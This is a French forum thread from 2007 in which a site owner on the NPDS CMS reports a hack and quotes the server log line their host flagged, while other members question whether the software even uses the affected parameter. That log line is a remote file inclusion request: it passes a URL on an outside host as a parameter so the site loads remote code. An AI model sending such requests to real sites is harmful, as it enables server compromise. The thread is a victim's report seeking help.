Index du forum »»  Sécurité »» Piratage site

Nouveau sujet
 Piratage site#22190Répondre

6Contributeur(s)
AnonymeBorisTitodeveloppeuroimAlat
3 Modérateur(s)
developpeurjpbJireck
Anonyme Anonymeicon_post
Bonsoir à tous!

Notre site a été piraté il y a quelques jours et donc OVH nous a alerté et signalé ce piratage.

OVH nous a enfin signalé la ligne du log qui montre la faille sur le site :
38.119.120.61 www.xxxxxx.com - [05/Apr/2007:13:37:48 +0200] "GET /index.php?st=http://turinagyker.hu/.img/xQt.c? HTTP/1.1" 302 5 "-" "libwww-perl/5.805"

Je suis étonné de voir qu'à partir de l'index on peut être piraté!??

Voilà c'était juste pour vous signaler le problème en attendant que j'épluche le script de index.php en détail.

Mais peut-être que vous avez une idée?

Message édité par : Boris / 12-04-2007 23:30

Anonyme Anonymeicon_post
URGENT!!!!

Est-il possible d'éditer le post et d'enlever la référence au site???

Merci d'avance!!!
Boris Borisicon_post
Fait. ;-)
Anonyme Anonymeicon_post
MERCI :=!

J'ai honte quand même :-(
Tito Titoicon_post
Euh...ton site, c'est du NPDS?
Boris Borisicon_post
oui, c'est du sable 5.10..... url-rewrité! :=!
Anonyme Anonymeicon_post
avec un st= .... ????
Tito Titoicon_post
Citation : Anonyme

avec un st= .... ????
Clairement! NPDS n'utilise pas de variable $st et en plus on a l'URL-Protect qui empêche ce genre d'attaques
Anonyme Anonymeicon_post
D'où peut provenir la faille alors ?
Tito Titoicon_post
Tu es sûr d'utiliser NPDS? :-?

Tu utiliserais pas le central board de Dodi?

Message édité par : Tito / 13-04-2007 18:02

Anonyme Anonymeicon_post
Citation : Boris 

oui, c'est du sable 5.10..... url-rewrité! :=!  


...
developpeur developpeuricon_post
avec un st=.... ca ne ressemble pas a ce que j'ai codé effectivement
Anonyme Anonymeicon_post
bah je sais pas quoi vous dire moi...
le site a été piraté comme indiqué dans le premier post
et développé sur NPDS ...
oim oimicon_post
Slt, donne nous l'adresse !
Tito Titoicon_post
Tu utilises le central board de Dodi?